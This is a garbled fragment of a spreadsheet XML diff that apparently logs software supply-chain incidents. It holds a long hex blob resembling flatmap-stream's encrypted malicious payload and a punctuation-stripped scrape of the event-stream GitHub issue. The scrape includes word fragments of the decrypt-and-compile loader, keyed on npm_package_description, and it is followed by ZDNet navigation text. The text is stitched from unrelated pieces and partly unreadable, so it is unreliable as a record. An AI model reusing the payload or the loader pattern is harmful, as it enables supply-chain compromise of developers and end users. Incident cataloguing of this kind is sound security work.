db67fdbfc39c249c6f338194555a41928413b792ff41855e27752e227ba81571483c631bc659563d071bf39277ac3316bd2e1fd865d5ba0be0bbbef3080eb5f6dfdf43b4a678685aa65f30128f8f36633f05285af182be8efe34a2a8f6c9c6663d4af8414baaccd490d6e577b6b57bf7f4d9de5c71ee6bbffd70015a768218a991e1719b5428354d10449f41bac70e5afb1a3e03a52b89a19d4cc333e43b677f4ec750bf0be23fb50f235dd6019058fbc3077c01d013142d9018b076698536d2536b7a1a6a48f5485871f7dc487419e862b1a7493d840f14e8070c8eff54da8013fd3fe103db2ecebc121f82919efb697c2c47f79516708def7accd883d980d5618efd408c0fd46fd387911d1e72e16cf8842c5fe3477e4b46aa7bb34e3cf9caddfca744b6a21b5457beaccff83fa6fb6e8f3876e4764e0d4b5318e7f3eed34af757eb240615591d5369d4ab1493c8a9c366dfa3981b92405e5ebcbfd5dca2c6f9b8e8890a4635254e1bc26d2f7a986e29fef6e67f9a55b6faec78d54eb08cb2f8ea785713b2ffd694e7562cf2b06d38a0f97d0b546b9a121620b7f9d9ccca51b5e74df4bdd82d2a5e336a1d6452912650cc2e8ffc41bd7aa17ab17f60b2bd0cfc0c35ed82c71c0662980f1242c4523fae7a85ccd5e821fe239bfb33d38df78099fd34f429d75117e39b888344d57290b21732f267c22681e4f640bec9437b756d3002a3135564f1c5947cc7c96e1370db7af6db24c9030fb216d0ac1d9b2ca17cb3b3d5955ffcc3237973685a2c078e10bc6e36717b1324022c8840b9a755cffdef6a4d1880a4b6072fd1eb7aabebb9b949e1e37be6dfb6437c3fd0e6f135bcea65e2a06eb35ff26dcf2b2772f8d0cde8e5fa5eec577e9754f6b044502f8ce8838d36827bd3fe91cccba2a04c3ee90c133352cbad34951fdf21a671a4e3940fd69cfee172df4123a0f678154871afa80f763d78df971a1317200d0ce5304b3f01ace921ea8afb41ec800ab834d81740353101408733fb710e99657554c50a4a8cb0a51477a07d6870b681cdc0be0600d912a0c711dc9442260265d50e269f02eb49da509592e0996d02a36a0ce040fff7bd3be57e97d07e4de0cdb93b7e3ccea422a5a526fb95ea8508ea2a40010f56d4aa96da23e6e9bcbae09dacccdcd8ac6af96a1922266c3795fb0798affaa75b8ae05221612ce45c824d1f6603fe2afd74b9e167736bfffe01a12b9f85912572a291336c693f133efeac881cd09207505ad93967e3b7a8972cdcce208bfa3b9956370795791ca91a8b9deabde26c3ee2adb43e9f7df2df16d4582a4e610b73754e609b1eea936a4d916bf5ed9d627692bcc8ed0933026e9250d16bdaf2b68470608aeaffedcf2be8c4c176bfc620e3f9f17a4a9d8ef9fe46cca41a79878d37423c0fa9f3ee1f4e6d68f029d6cbb5cbc90e7243135e0fc1dd66297d32adabc9a6d0235709be173b688ba2004f518f58f5459caca60d615ae4dc0d0eeacbe48ca8727a8b42dc78396316a0e223029b76311e7607ea5bd236307ba3b62afeff7a1ef5c0b5d7ee760c0f6472359c57817c5d9cd534d9a34bb4847bbc83c37b14b6444e9f386f1bec4b42c65d1078d54bd007ff545028205099abc454919406408b761a1636d10e39ede9f650f25abad3219b9d46d535402b930488535d97d19be3b0e75fed31d0b2f8af099481685e2b4fa9bff05cbac1b9b405db2c7eae68501633e02723560727a1c8c34c32afc76cdeb82fe8bae34b09cd82402076b9f481d043b080d851c7b6ba8613adba3bc3d5edb9a84fce41130ad328fe4c062a76966cb60c4fa801f359d22b70a797a2c2a3d19da7383025cb2e076b9c30b862456ae4b60197101e82133748c224a1431545fde146d98723ccb79b47155b218914c76f5d52027c06c6c913450fc56527a34c3fe1349f38018a55910de819add6204ab2829668ca0b7afb0d00f00c873a3f18daad9ae662b09c775cddbe98b9e7a43f1f8318665027636d1de18b5a77f548e9ede3b73e3777c44ec962fb7a94c56d8b34c1da603b3fc250799aad48cc007263daf8969dbe9f8ade2ac66f5b66657d8b56050ff14d8f759dd2c7c0411d92157531cfc3ac9c981e327fd6b140fb2abf994fa91aecc2c4fef5f210f52d487f117873df6e847769c06db7f8642cd2426b6ce00d6218413fdbba5bbbebc4e94bffdef6985a0e800132fe5821e62f2c1d79ddb5656bd5102176d33d79cf4560453ca7fd3d3c3be0190ae356efaaf5e2892f0d80c437eade2d28698148e72fbe17f1fac993a1314052345b701d65bb0ea3710145df687bb17182cd3ad6c121afef20bf02e0100fd63cbbf498321795372398c983eb31f184fa1adbb24759e395def34e1a726c3604591b67928da6c6a8c5f96808edfc7990a585411ffe633bae6a3ed6c132b1547237cab6f3b24c57d3d4cd8e2fbbd9f7674ececf0f66b39c2591330acc1ac20732a98e9b61a3fd979f88ab7211acbf629fcb0c80fb5ed1ea55df0735dcf13510304652763a5ed7bde3e5ebda1bf72110789ebefa469b70f6b4add29ce1471fa6972df108717100412c804efcf8aaba277f0107b1c51f15f144ab02dd8f334d5b48caf24a4492979fa425c4c25c4d213408ecfeb82f34e7d20f26f65fa4e89db57582d6a928914ee6fc0c6cc0a9793aa032883ea5a2d2135dbfcf762f4a2e22585966be376d30fbfabb1dfd182e7b174097481763c04f5d7cbd060c5a36dc0e3dd235de1669f3db8747d5b74d8c1cc9ab3a919e257fb7e6809f15ab7c2506437ced02f03416a1240a555f842a11cde514c450a2f8536f25c60bbe0e1b013d8dd407e4cb171216e30835af7ca0d9e3ff33451c6236704b814c800ecc6833a0e66cd2c487862172bc8a1acb7786ddc4e05ba4e41ada15e0d6334a8bf51373722c26b96bbe4d704386469752d2cda5ca73f7399ff0df165abb720810a4dc19f76ca748a34cb3d0f9b0d800d7657f702284c6e818080d4d9c6fff481f76fb7a7c5d513eae7aa84484822f98a183e192f71ea4e53a45415ddb03039549b18bc6e1 63727970746f 656e76 6e706d5f7061636b6167655f6465736372697074696f6e 5f636f6d70696c65 ten3en4 npmpackagedescription processdecoden3decoden4 npmpackagedescription processenvnpmpackagedescription npmpackagedescription children description pstree decryption return npmpackagedescription return ren2en6en5 decipher requiredecoden2decoden6decoden5 npmpackagedescription decipher require crypto createdecipher aes256 npmpackagedescription uupdaten0 decoded decipherupdaten0 decoded decipher update utf8 console ufinalen9 decoded decipher final utf8 moduleconstructor newmodule module constructor uncomment runs code fpaths modulepaths fen7a fexportsn1 newmodulepaths modulepaths newmodulecompiledecoded newmoduleexportsn1 newmodulepaths modulepaths newmodulecompiledecoded moduleprototypecompile functioncontent filename newmoduleexportsn1 text updated successfully errors encountered jaydenseric mashaal limonte haprog laurynasra martijncuppens mysticatea momota10s sodatea reacted thumbs emoji jsloverperson onkeep hitmands cailinpitt vdyalex reacted thumbs emoji skphilipp 4ndygu garkin leotm rebane2001 zseha drewdennison dkns nouney mrmebelman reacted laugh emoji bovine3dom thiagolopes jhong93 swedneck cuzkey ashwinrs erikzigo cweiske cikey ndesilets reacted hooray emoji kernelfail jeremycole optimuspi jmz7v mparker3 andlt mimoo lpicanco jeanbza atribecalledkwest reacted confused emoji bathoswistia genetiquetechno zseha runjak ecdeveloper jmorrell mrmebelman christiangenco paulogdm macpham reacted heart emoji reactions reactions reactions reactions reactions reactions reactions referenced deprecation warning start remynodemon1442 closed missing tags releases closed dependency attack specifically targeting pstree indexzeropstree33 closed remove pstreeremy remynodemon1454 closed limonte mentioned issue eventstream devdependency sweetalert2sweetalert21301 closed copy link jaydenseric commented fallingsnow manage work attack christianbundy cjthomp mattvonrocketstein patmyron diamondyuan jonpastore praphanwlr cryptix wilk maziarz reacted thumbs emoji keenwon deamonish maziarz halidcisse reacted hooray emoji reactions reactions reactions sorry something went wrong copy link author fallingsnow commented spent better part trying something gibberish encrypted payload tried executing gibberish errors believe possible reasons havent able actual payloads code might using correct passphrase even though description pstree passphrase actually successfully decrypts encrypted payload still correct passphrase using invalid charset payload christianbundy koskila cjthomp henrycwong jkmdev ndelangen timocov exeboss gmfc pesho reacted thumbs emoji reactions reactions sorry something went wrong copy link jaydenseric commented edited unpkg link help people poke around httpsunpkgcomflatmapstream011indexminjs christianbundy oca159 eanplatter brunoscheufler konradit seanders harrisjt henrycwong josgraha patmyron reacted thumbs emoji reactions reactions sorry something went wrong copy link owner dominictarr commented emailed said wanted maintain module gave dont thing maintaining module dont even anymore havnt years wescook adelarsq squaresmile potlee ashleyconnor siloufr microsoftly nelsonic brentvatne astevens reacted thumbs emoji stonecypher ahiknsr dharmab williamboman mariusz miguelmota parroit albab novwhisky vmarquet reacted thumbs emoji nietaki just1689 bobwhitelock willmorgan rhaamo coldmind mrmebelman caseyhall gpestana lakret reacted laugh emoji kevinhock laurentiuneciu23 openfly bathoswistia philipzaengle thiagolopes jurjdev richiewebgate reacted hooray emoji mathiasbynens uzantnomo ihsw parhamr asumagic kobi goloroden fzero realplatanopapi ringokam reacted confused emoji thangngoc89 agconti valpackett wescook chiliman potlee gangstead flexbox avgp tnorthb reacted heart emoji reactions reactions reactions reactions reactions reactions reactions sorry something went wrong copy link owner dominictarr commented note longer publish rights module komali2 cloudcome poddster vinayakkulkarni fbo3264 arturgoms rafaelcseventh arminrosu qirh pcho reacted thumbs emoji jakow santhoshsoundar jasonjcpeng thebigdalt jordie23 relign pefish calvinf patrick330602 944zhang reacted thumbs emoji limonte ggassmann brainkim oott123 luongkomorebi stevenbentley bsansouci zseha craighooghiem cupnoodle reacted laugh emoji brainkim dlindenkreuz irufus pratikzambani wareya sudokai optimuspi rabipenguinpay aushakou dorianmarchal reacted hooray emoji patmyron ajoslin styfle ihsw mathiasbynens ikaripl ctsrc pratikzambani passy fishrock123 reacted confused emoji christianbundy rafaelcaricio bschaeffer jjjollyjim norlin haroenv adipjackson kaershushu arranf havef reacted heart emoji reactions reactions reactions reactions reactions reactions reactions sorry something went wrong copy link xhmikosr commented please contact support take care situation jaydenseric limonte robertgj mrkev roytinker patmyron gnclmorais tauntz mmmeff jdorfman reacted thumbs emoji federicoceratto ihsw mrsapps poddster therustmonk sandorkazi mirhmousavi davidvuong reacted laugh emoji gersonrevatta kevinhock reacted heart emoji reactions reactions reactions reactions sorry something went wrong copy link limonte commented edited note longer publish rights module owner eventstream right9ctrl right9ctrloutlookcom transfer publishing rights unknown dude keep repo username well done mate nextgenthemes necevil potlee timzaman lvl99 vmarquet darkyen dmitrif mrzool four43 reacted thumbs emoji tumdum stryju ocdtrekkie magnetowasright wescook adelarsq vincemtnz albab zcstarr warnerawesomemoore reacted thumbs emoji brainkim annedroiid shakthalmic rvalue sinistersnare caiobianchi sergiotapia nischaym macnaughton joshvarty reacted laugh emoji bauschri mrmebelman rabipenguinpay tmwack neuromancer85 eivindml emilva franeklubi callaars maxfenton reacted hooray emoji neuromancer85 ringokam nikeplusruss jonathanfrias ashawley maieonbrix krisread gabmontes kirb lrossy reacted confused emoji kevinhock reacted heart emoji reactions reactions reactions reactions reactions reactions reaction sorry something went wrong xhmikosr mentioned issue remove eventstream dependency mysticateanpmrunall149 closed copy link owner dominictarr commented limonte tried transfer right9ctrl github errored already fork httpgithubcomright9ctrleventstream guys feel strongly dont volunteer maintain contact support alanfranz preinheimer floatingatoll tschellenbach jesssol arve0 magnetowasright sajit atanasbozhkov wescook reacted thumbs emoji limonte jaydenseric jackallnutt themainframe danielkoehler vooders joshfrogers rjhesketh leocassarani jasonswindle reacted thumbs emoji pugson assafmo kardanovir leonfedotov itstarik arranf eric0625 tkgalk arackaf garnetsunset reacted laugh emoji kevinhock reacted hooray emoji miakomoto patmyron tapewerm devofure dpilafian lacksfish fhusquinet julianbonomini garnetsunset reacted confused emoji thousandsofthem kevinhock scottsheffield alanyee neonichu wpietri kamaln7 murgo zinggi reacted heart emoji reactions reactions reactions reactions reaction reactions reactions sorry something went wrong copy link jaydenseric commented know project danger eventstream flatmapstream actor publishing rights eventstream flatmapstream contains malicious code specifically flatmapstream011 future version cant trusted example result projects redacted npmrunall413 pstree110 eventstream336 flatmapstream012 pur3miish davidrapin narrowtux krinoid mrkev paragoniescott mrkwse sethdavenport daohoangson albab reacted thumbs emoji poddster keishon104 reacted laugh emoji davidrapin sethdavenport afaulconbridge roneesh garrettdehnketurpin spiritbreaker226 robinlaw fwip groundpound glenhughes reacted heart emoji reactions reactions reactions reactions sorry something went wrong copy link xhmikosr commented dominictarr although completely disagree someone else contacting support contacted support risk millions people making something free public means responsible package anyway dont want argue want issue solved popular package jaydenseric limonte mrkev mrkwse mugli michaeldclifford ferenczy annedroiid ssoper sthuck reacted thumbs emoji tumdum nouney piedoom joncfoo eldarshamukhamedov delroth simontamman cal97g pharisaeus glebmachine reacted thumbs emoji poddster tanzeelrana reacted laugh emoji sabueso cailinpitt reacted hooray emoji laurentiuneciu23 lllusion3469 andrerfneves orangecms franciscop felipelalli paultaykalo sunny jvgreenaway reacted confused emoji martijncuppens shumphrey vooders mrkev shakthalmic jmyers glebmachine warnerawesomemoore tauntz mtheoryx reacted heart emoji reactions reactions reactions reactions reactions reactions reactions sorry something went wrong copy link limonte commented edited guys feel strongly dont volunteer maintain contact support dominictarr apparently dont want take responsibility package thats fine free community whatever want least indicate somehow youre maintaining repo anymore archive repo archive repository letting people know project longer actively maintained mrkev paragoniescott mugli michaeldclifford annedroiid shunliang omaksi valpackett lll000111 simontamman reacted thumbs emoji cfv1984 christianbundy maxpt benjuang izogain dmikalova aciccarello martijnhols cainus moteta reacted thumbs emoji poddster reacted laugh emoji mdeboer reacted heart emoji reactions reactions reactions reaction reaction sorry something went wrong copy link jaydenseric commented huge difference maintaining repopackage giving away hacker actually takes effort nothing denying responsibility affects millions innocent people limonte xhmikosr pur3miish eddyerburgh usainbloot mattrhysjones shumphrey vooders cheshireswift spookyuser reacted thumbs emoji cfv1984 timothyklim christianbundy maxpt archseer vincelwt ctsrc bonesywonesy benjuang frewsxcv reacted thumbs emoji corentinj chuckhousley debajyotithetaonelab sandorkazi vdyalex danihodovic zackmorgs reacted laugh emoji wescook philipzaengle rconadmin kinnardian rgarner arturgvieirazz nickgeek queer aloisdg sunny reacted confused emoji franeklubi philipzaengle johnnyasantoss ccooper davidzech leonardiwagner gabmontes bayareawebpro jaggy zoni reacted heart emoji reactions reactions reactions reactions reactions reactions sorry something went wrong yhatt mentioned issue upgrade dependent packages prevent malicious attack marpteammarpit96 merged mysticatea mentioned issue flatmapstream011 microsoftmonacoeditor1211 closed referenced pstree package unsafe better find alternative bahmutovstartserverandtest128 closed pstree package unsafe better find alternative dwylterminate35 closed gverni mentioned issue remove eventstream dependency sweetalert2sweetalert21305 merged chrisbashton mentioned issue vulnerability eventstream dependency mysticateanpmrunall150 closed chrisbashton added commit bbcsimorgh referenced issue replaces npmrunall concurrently 71eb5e2 fixes eventstream vulnerability dominictarreventstream116 chrisbashton mentioned issue replaces npmrunall concurrently bbcsimorgh988 closed tasks jasonwilliams mentioned issue bump nodemon version avoid issue izhakinodemonwebpackplugin23 closed chrisbashton added commit bbcsimorgh referenced issue lock eventstream 34dd2fa fixes vulnerability highlighted dominictarreventstream116 chrisbashton mentioned issue lock eventstream bbcsimorgh990 closed tasks chrisbashton added commit bbcsimorgh referenced issue upgrade npmrunall v415 dcd98bf fixes vulnerability dominictarreventstream116 mysticateanpmrunall150 comment hidden items load more… antoniond mentioned issue maintainership project gbdevrgbds369 closed mfazekas mentioned issue remove trailing whitespaces netsshnetssh689 closed ioquatix mentioned issue proactive potential issues rubygemsrubygemsorg2101 closed benhylau mentioned issue whats wrong open source right ferossfunding10 open eomm mentioned issue eomm post ghinkspackagemaintenance1 closed berbiche mentioned issue ansible dependencies ansiblegalaxy roles berbicheoldinfrastructure1 closed ghost mentioned issue update eventstream latest version hakubogulpfolders12 open n313893254 mentioned issue devdependencies cannot found yarn install rancherapiui15 closed sourabhsparkala mentioned issue github advisories vulnerability database sapfosstarsratingcore90 closed gendx mentioned issue adding support informational warnings crates looking maintainers rustsecrustsec247 open maskedman99 mentioned issue discussions regarding recent changes nano projects jspenguin2017snippets2 closed tacothedank mentioned issue urgent maintainer probably malicious greatsuspenderthegreatsuspender1263 open mendboltforgithub mentioned issue ws20180211 high detected flatmapstream011tgz eventstream336tgz osweekendseventpoints150 open sk33lz mentioned issue removing deprecated images probociprobo199 merged sandeepsingh79 mentioned issue node devicefarmerstf231 open mendforgithubcom mentioned issue ws20180211 critical detected flatmapstream011tgz eventstream336tgz snowdensbdependabotcore191 open jacobfriedman mentioned issue overhaul needed deprecations arthwangvsclogtalk9 open natsukiai mentioned issue beautiful loader component monkvisionmonkjs1 merged volkancakil mentioned issue version contains malicious code dominictarrrc131 open aspie96 mentioned issue eventstream paraditegithubdramas1 closed adrelanos mentioned issue session private messenger consider supply chain attacks oxeniosessiondesktop2321 closed algomaster99 mentioned issue details eventstream attack chainsprojectchainsprojectgithubio10 merged referenced trivy find vulnerabilities misconfigurations secrets sbom containers kubernetes code repositories clouds sentenzdevops52 closed secretlint prevent committing credential sentenzdevops49 open marceloferraz mentioned issue featureminimal changes moshtixshowuswhatyougot63 open referenced bullarena245tgz vulnerabilities highest severity amaybaumdevdependabotcore49 open bullarena245tgz vulnerabilities highest severity amaybaumdevdependabotcore254 open devmendforgithubcom mentioned issue bullarena245tgz vulnerabilities highest severity amaybaumdevdependabotcore354 open tyasarlar referenced issue tyasarlarthetea update readmemd 1f16173 potusbaker mentioned issue help potusbakerbarronnwo1 open sign free subscribe conversation github already account sign assignees assigned labels none projects none milestone milestone development successfully merging pull request close issue chorecore update deps potential vuln peerigonparsedomain participants others footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t xml:space="preserve">A malicious developer modified event-stream to then depend on a malicious package, flatmap-stream. </t>
         </is>
       </c>
       <c r="D89" t="inlineStr">
         <is>
           <t>https://github.com/dominictarr/event-stream/issues/116#issuecomment-441759047</t>
-        </is>
-      </c>
-      <c r="E89" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'repository', 'owner', 'public', 'archive', 'notification', 'star', 'issue', 'request', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'wiki', 'insight', 'closed', 'issue', 'comment', 'peerigonparsedomain57', 'issue', 'comment', 'peerigonparsedomain57', 'comment', 'copy', 'link', 'edited', 'edit', 'cryptocurrency', 'maths22', 'target', 'library', 'package', 'point', 'cryptocurrency', 'related', 'library', 'flatmapstream011', 'eventstream', 'flatmapstream', 'example', 'eventstream', 'flatmapstream', 'flatmapstream011', 'user', 'good', 'analysis', 'payload', 'comment', 'comment', 'comment', 'time', 'fix', 'malicious', 'version', 'developer', 'aware', 'post', 'developer', 'eventstream', 'dependency', 'people', 'version', 'flatmapstream', 'version', 'late', 'injection', 'month', 'injection', 'pstree', 'exact', 'time', 'injection', 'flatmapstream', 'bump', 'version', 'second', 'commit', 'day', 'injection', 'bump', 'major', 'version', 'clear', 'million', 'weekly', 'install', 'flatmapstream', 'injection', 'attack', 'unusedunknown', 'library', 'download', 'exact', 'date', 'question', 'break', 'flatmapstream', 'portion', 'unminified', 'source', 'minified', 'source', 'code', 'little', 'well', 'bad', 'part', 'datum', 'byte', 'regular', 'javascript', 'process', 'function', 'datum', 'return', 'buffer', 'datum', 're2e2f746573742f64617461', 'npmpackagedescription', 'npmpackagedescription', 'processenvnpmpackagedescription', 'npmpackagedescription', 'child', 'description', 'pstree', 'decryption', 'return', 'npmpackagedescription', 'return', 'npmpackagedescription', 'decipher', 'npmpackagedescription', 'uupdaten0', 'decipher', 'update', 'console', 'ufinalen9', 'final', 'moduleconstructor', 'constructor', 'uncomment', 'code', 'fpath', 'filename', 'newmoduleexportsn1', 'text', 'error', 'thumb', 'thumb', 'garkin', 'leotm', 'zseha', 'drewdennison', 'ndesilet', 'zseha', 'paulogdm', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'deprecation', 'warning', 'start', 'tag', 'release', 'dependency', 'attack', 'pstree', 'indexzeropstree33', 'issue', 'eventstream', 'devdependency', 'copy', 'link', 'work', 'attack', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'well', 'part', 'payload', 'gibberish', 'error', 'possible', 'reason', 'able', 'actual', 'payload', 'code', 'correct', 'passphrase', 'description', 'pstree', 'passphrase', 'payload', 'passphrase', 'invalid', 'thumb', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'link', 'people', 'httpsunpkgcomflatmapstream011indexminj', 'christianbundy', 'oca159', 'eanplatter', 'brunoscheufler', 'seander', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'module', 'module', 'year', 'asteven', 'thumb', 'bobwhitelock', 'caseyhall', 'mathiasbynen', 'confused', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'right', 'module', 'komali2', 'arturgom', 'thumb', 'pefish', 'calvinf', 'patrick330602', 'thumb', 'zseha', 'cupnoodle', 'sudokai', 'optimuspi', 'rabipenguinpay', 'aushakou', 'dorianmarchal', 'mathiasbynen', 'ikaripl', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'contact', 'support', 'care', 'situation', 'mrkev', 'thumb', 'gersonrevatta', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'note', 'right', 'module', 'owner', 'transfer', 'publishing', 'right', 'unknown', 'dude', 'username', 'mate', 'nextgentheme', 'four43', 'thumb', 'rvalue', 'mrmebelman', 'neuromancer85', 'confused', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'issue', 'eventstream', 'dependency', 'mysticateanpmrunall149', 'copy', 'link', 'transfer', 'guy', 'contact', 'support', 'thumb', 'thumb', 'tkgalk', 'devofure', 'dpilafian', 'confused', 'thousandsofthem', 'wpietri', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'commented', 'know', 'project', 'danger', 'eventstream', 'flatmapstream', 'actor', 'publishing', 'right', 'eventstream', 'flatmapstream', 'malicious', 'code', 'flatmapstream011', 'future', 'version', 'example', 'result', 'project', 'pur3miish', 'davidrapin', 'mrkev', 'thumb', 'davidrapin', 'sethdavenport', 'afaulconbridge', 'glenhughe', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'support', 'support', 'risk', 'people', 'free', 'public', 'responsible', 'package', 'argue', 'issue', 'popular', 'package', 'thumb', 'sabueso', 'laurentiuneciu23', 'paultaykalo', 'sunny', 'jvgreenaway', 'confused', 'vooder', 'mrkev', 'shakthalmic', 'jmyer', 'heart', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'guy', 'contact', 'support', 'responsibility', 'package', 'fine', 'free', 'community', 'repository', 'people', 'project', 'mrkev', 'thumb', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'huge', 'difference', 'repopackage', 'hacker', 'effort', 'responsibility', 'million', 'innocent', 'people', 'mattrhysjone', 'vooder', 'cheshireswift', 'thumb', 'thumb', 'corentinj', 'confused', 'franeklubi', 'philipzaengle', 'johnnyasantoss', 'ccooper', 'heart', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'issue', 'dependent', 'package', 'malicious', 'attack', 'marpteammarpit96', 'mysticatea', 'issue', 'pstree', 'package', 'alternative', 'pstree', 'package', 'alternative', 'dwylterminate35', 'gverni', 'issue', 'eventstream', 'dependency', 'merged', 'issue', 'vulnerability', 'eventstream', 'dependency', 'closed', 'issue', '71eb5e2', 'fix', 'eventstream', 'vulnerability', 'issue', 'task', 'jasonwilliam', 'issue', 'issue', 'izhakinodemonwebpackplugin23', 'issue', 'eventstream', 'fix', 'vulnerability', 'issue', 'task', 'issue', 'dcd98bf', 'fix', 'vulnerability', 'mysticateanpmrunall150', 'item', 'more', 'antoniond', 'issue', 'maintainership', 'project', 'closed', 'issue', 'whitespace', 'closed', 'ioquatix', 'issue', 'proactive', 'potential', 'issue', 'issue', 'wrong', 'open', 'source', 'right', 'ferossfunding10', 'open', 'eomm', 'issue', 'eomm', 'ghinkspackagemaintenance1', 'closed', 'issue', 'ansible', 'dependency', 'berbicheoldinfrastructure1', 'ghost', 'issue', 'eventstream', 'late', 'version', 'hakubogulpfolders12', 'open', 'issue', 'devdependencie', 'yarn', 'install', 'issue', 'vulnerability', 'issue', 'support', 'informational', 'warning', 'crate', 'rustsecrustsec247', 'open', 'maskedman99', 'issue', 'discussion', 'recent', 'change', 'nano', 'project', 'issue', 'urgent', 'maintainer', 'malicious', 'open', 'issue', 'eventstream336tgz', 'osweekendseventpoints150', 'open', 'sk33lz', 'issue', 'deprecated', 'image', 'sandeepsingh79', 'issue', 'open', 'issue', 'critical', 'eventstream336tgz', 'open', 'issue', 'overhaul', 'deprecation', 'issue', 'beautiful', 'loader', 'component', 'issue', 'version', 'malicious', 'code', 'open', 'aspie96', 'issue', 'eventstream', 'issue', 'session', 'private', 'messenger', 'supply', 'chain', 'attack', 'closed', 'algomaster99', 'issue', 'detail', 'eventstream', 'attack', 'trivy', 'find', 'vulnerability', 'misconfiguration', 'secret', 'sbom', 'container', 'repository', 'closed', 'secretlint', 'issue', 'featureminimal', 'change', 'open', 'high', 'severity', 'amaybaumdevdependabotcore49', 'open', 'high', 'severity', 'open', 'devmendforgithubcom', 'issue', 'high', 'severity', 'issue', 'tyasarlarthetea', 'issue', 'potusbakerbarronnwo1', 'open', 'sign', 'free', 'subscribe', 'conversation', 'account', 'sign', 'label', 'none', 'none', 'milestone', 'development', 'request', 'close', 'issue', 'dep', 'potential', 'peerigonparsedomain', 'other', 'footer', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -2766,15 +2413,14 @@
           <t>jcenter and bintray</t>
         </is>
       </c>
-      <c r="C90" t="inlineStr"/>
+      <c r="C90" t="inlineStr">
+        <is>
+          <t>Malicious dependency in AndroidAudioRecorder steals make and model info</t>
+        </is>
+      </c>
       <c r="D90" t="inlineStr">
         <is>
           <t>https://blog.autsoft.hu/a-confusing-dependency/</t>
-        </is>
-      </c>
-      <c r="E90" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2791,17 +2437,12 @@
       </c>
       <c r="C91" t="inlineStr">
         <is>
-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth 